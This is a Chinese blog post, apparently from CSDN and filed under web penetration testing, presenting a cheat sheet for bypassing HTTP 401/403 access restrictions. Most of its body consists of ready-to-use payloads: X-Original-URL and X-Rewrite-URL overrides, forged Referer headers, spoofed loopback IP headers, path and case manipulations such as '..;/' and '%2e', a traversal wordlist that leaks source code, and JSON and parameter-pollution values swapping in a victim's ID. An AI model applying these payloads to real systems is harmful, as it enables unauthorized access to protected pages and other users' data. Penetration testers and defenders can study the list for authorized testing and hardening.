401/403绕过

于 2024-08-22 11:00:27 发布
阅读量64 收藏 1
点赞数
分类专栏: web渗透测试 文章标签: 网络安全 系统安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/141421338
版权

文章目录

一、覆盖请求URL

尝试使用X-Original-URLX-Rewrite-URL标头绕过Web服务器的限制。

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
X-Original-URL: /auth/login
Response
HTTP/1.1 200 OK

Reqeust
GET / HTTP/1.1
X-Rewrite-URL: /auth/login
Response
HTTP/1.1 200 OK

二、Referer头绕过

Referer请求头包含了当前请求页面的来源页面的地址,即表示当前页面是通过此来源页面里的链接进入的。服务端一般使用Referer请求头识别访问来源。

GET /auth/login HTTP/1.1
Host: xxx
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
Host: xxx
ReFerer:https://xxx/auth/login
Response
HTTP/1.1 200 OK

Reqeust
GET /auth/login HTTP/1.1
Host: xxx
ReFerer:https://xxx/auth/login
Response
HTTP/1.1 200 OK

三、代理IP

一般开发者会通过Nginx代理识别访问端IP限制对接口的访问,尝试使用X-Forwarded-ForX-Forwared-Host等标头绕过Web服务器的限制。

X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1

# IP
127.0.0.1
0.0.0.0
192.168.0.1
10.0.0.1
172.16.0.1

四、扩展名绕过

基于扩展名,用于绕过403受限制的目录。

site.com/admin => 403
site.com/admin/ => 200
site.com/admin// => 200
site.com//admin// => 200
site.com/admin/* => 200
site.com/admin/*/ => 200
site.com/admin/. => 200
site.com/admin/./ => 200
site.com/admin/./. => 200
site.com/admin? => 200
site.com/admin?? => 200
site.com/admin??? => 200
site.com/admin..;/ => 200
site.com/admin/..;/ => 200
site.com/%2f/admin => 200
site.com/%2e/admin => 200
site.com/admin%20/ =>200
site.com/admin%09/ => 200
site.com/%20admin%20/ => 200

五、大小写替换&…

# 大小写
site.com/admin -> 403 Forbidden
site.com/Admin -> 200 OK
site.com/aDmin -> 200 OK

# ..
site.com/index.php -> File not found
site.com/assets../index.php -> source code
##字典
assets../index.php
/img../index.php
/js../index.php
/vendors../index.php
/media../index.php

六、其他绕过思路

/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:[111]} --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:{“id”:111}} --> 200 OK
{"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON 参数污染)
user_id=ATTACKER_ID&user_id=VICTIM_ID (参数污染)
PT_silver
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
401403页面绕过技巧总结
墨痕诉清风的博客
07-18 2095
通过支持X-Original-URL和X-Rewrite-URL标头,用户可以使用X-Original-URL或X-Rewrite-URL HTTP请求标头覆盖请求URL中的路径,尝试绕过对更高级别的缓存和Web服务器的限制。一般开发者会通过Nginx代理识别访问端IP限制对接口的访问,尝试使用 X-Forwarded-For、X-Forwared-Host等标头绕过Web服务器的限制。Referer 请求头包含了当前请求页面的来源页面的地址,即表示当前页面是通过此来源页面里的链接进入的。
绕过HTTP401403响应限制工具
墨痕诉清风的博客
06-26 253
一种旨在自动化各种技术的工具,以绕过HTTP 401403响应代码并访问系统中未授权的区域。此代码是为安全爱好者和专业人士只。使用它在您自己的风险。
403&401Bypass绕过
Caideyib的博客
11-09 508
修改Host值,如果网站做了基于域名或则和ip地址的访问控制策略限制一些敏感资源的访问,可以通过修改host值(比如通过信息收集到的子域,或者是目标的其他资产ip或者是内网 ip)都可以进行尝试从而绕过访问控制策略。403也有可能是waf导致,waf中配置了禁止访问的文件名或者路径,此时可以尝试通过填充脏数据,大小写,双重URL编码或者fuzz路径来尝试bypass。如果网页不是直接从原始服务器获取,而是通过代理服务器中转或代理传输的,代理服务器可以限制你访问私有信息,对一些敏感请求进行拦截。
渗透测试-渗透中403/401页面绕过的思路总结
lza20001103的博客
08-29 5388
渗透中403/401页面绕过的思路总结 文章目录渗透中403/401页面绕过的思路总结0x01 前言0x02 利用姿势1.端口利用2.修改HOST3.覆盖请求URL4.Referer标头绕过5.代理IP6.扩展名绕过7.扫描的时候8.最后补充再一些401403 bypass的tips 0x01 前言 做渗透时经常会碰到扫到的资产403的情况,特别是资产微乎其微的情况下,面试有时也会问到,这里做个总结! 0x02 利用姿势 1.端口利用 扫描主机端口,找其它开放web服务的端口,访问其端口,挑软柿子。 2
渗透技巧之403绕过_指纹识别
热门推荐
N的博客
03-14 7万+
渗透技巧之403绕过_指纹识别
一些绕过403的姿势
weixin_45253622的博客
01-16 7225
端口利用 扫描主机端口,找其它开放web服务的端口;访问其端口。 修改HOST 把host值修改为子域名或者ip来绕过。 覆盖请求 URL 尝试使用 X-Original-URL 和 X-Rewrite-URL 标头绕过 Web 服务器的限制。 Request GET /auth/login HTTP/1.1 Response HTTP/1.1 403 Forbidden Reqeust GET / HTTP/1.1 X-Original-URL: /auth/login Re
记一次403绕过技巧
mingyqf的博客
04-24 7045
记一次403绕过技巧 文章目录记一次403绕过技巧姿势一: 端口利用姿势二:修改HOST姿势三:覆盖请求URL姿势四:Referer标头绕过姿势五:代理IP姿势六:扩展名绕过 背景 记一次接到客户的一个需求,后台管理地址(https://xxx.xxxx.com)仅允许工作区公网出口访问,对于IP的访问限制是否存在缺陷可以绕过,外网进行访问返回403状态码。 实战 姿势一: 端口利用 拿到客户给的地址后,首先进行信息收集。端口信息收集,利用nmap进行全端口探测,发现除了80端口之外,还开放了一个web
403页面绕过
qq_63980959的博客
02-29 1963
拿到客户给的地址后,首先进行信息收集。端口信息收集,利用nmap进行全端口探测,发现除了80端口之外,还开放了一个web服务的8001端口,我们尝试使用8001端口访问(https://xxx.xxxx.com:8001),总是充满惊喜。可直接绕过IP限制进行访问。怕是这个运维要挨锤了,立马把这个问题,反馈给客户。https://iamadmixxx.xxx.xxx:8001/auth/login通过沟通,由于疏忽未下线8001端口,客户貌似认为这个很简单,关闭8001端口,下线业务后,让我们继续尝试后台能
web端一些绕过小技巧
Redredredfish的博客
10-11 2218
目录搜集绕过403401 ①修改http头字段 如X-Originating-IP,X-Remote-IP,X-Clinet-IP,X-Forwarded-For 等。 有时候公司会将可访问敏感数据的ip列入白名单。这些头字段将IP地址作为值,并允许您在提供的IP与其白名单中的IP匹配时进行访问。 还可以尝试修改一些字段为特殊目录,如X-Original-URL,X-Override-URL,X-Rewrite-URL等可以设置为X-Original-URL: /admin。 ②使用编码字符 例如 %..
BypassSuper:绕过403401或404
05-23
一款针对403/401页面进行快速、高效尝试Bypass的扫描工具 ______ _____ | ___ \ / ___| | |_/ /_ _ _ __ __ _ ___ ___ \ `--. _ _ _ __ ___ _ __ | ___ \ | | | '_ \ / _` / __/ __| `--. \ | | | '_ \ / _ \ '_...
4-ZERO-3:403401绕过方法+ Bash自动化+您的支持;)
03-04
4-ZERO-3工具绕过403/401。 该脚本包含执行此操作的所有可能技术。 注意:如果看到多个[200 Ok] /旁路作为输出,则必须检查Content-Length。 如果多次(200 OK)/旁路的内容长度相同,则表示误报。 原因可能是“ ...
TCP/IP详解part_2
12-29
24.6 PAWS:防止回绕的序号 265 24.7 T/TCP:为事务用的TCP扩展 265 24.8 TCP的性能 267 24.9 小结 268 第25章 SNMP:简单网络管理协议 270 25.1 引言 270 25.2 协议 270 25.3 管理信息结构 272 25.4 对象标识符 274...
康佳维修资料-B系列彩电-B系列彩电开关电源分析.doc
12-25
随着V401集电极电流的增加,开关变压器的正反馈绕组产生脉冲电压,此电压通过VD407、R406、R417向V401基极提供电流,同时V406吸收部分电流,共同控制开关管的工作状态。 3. 特性: - 宽电压工作范围:能在140V到...
第十二章 WEB渗透1
08-04
9. **编码与字符集**:URL编码(如UTF-8)、路径遍历(/./)、特殊字符绕过、空格替换、制表符利用等,这些都是黑客尝试绕过安全机制的常见方法。 10. **错误报告与模式控制**:在Nikto中,`-vhost`、`-v`(verbose...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8405
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
SQL注入(head、报错、盲注)
m0_74249600的博客
08-12 1515
本文讲述了head注入、报错注入以及时间盲注与布尔盲注等sql注入的基本注入类型,之后我会继续出sql注入知识点总结直至完整,请关注持续更新(本文内容来自课件,如有版权问题请与我联系)
【链表在Java中DeBug】
最新发布
在这个充满危险的乱世之中,只有学会烤鸡才能顽强的活下去。
08-19 266
时,你实际上是在告诉当前节点 cur:“你的下一个节点应该是这个新创建的节点。,你将 cur 的引用更新为新创建的节点,这样 cur 现在就指向了你刚刚添加到链表末尾的节点。实际上,head 是一个固定的引用,它始终指向链表的第一个节点(即头节点)。当你看到链表似乎“增长”了,这实际上是因为你通过操作 cur(当前节点的引用)在链表的末尾添加了新的节点。所以,当你看到链表“增长”时,你实际上是在通过更新节点之间的链接(即 next 指针)来扩展链表结构。它只是保持了对链表起始节点的引用。
使用Python创建LNK文件选择器并导出配置文件
Winfredzhang的博客
08-16 735
在这篇博客中,我们探讨了如何利用wxPython和库创建一个简单但功能强大的工具。通过这个工具,用户可以选择、配置.lnk文件,并导出为特定格式的INI文件。这不仅提高了配置文件管理的效率,也展示了 Python 在桌面应用开发中的强大功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值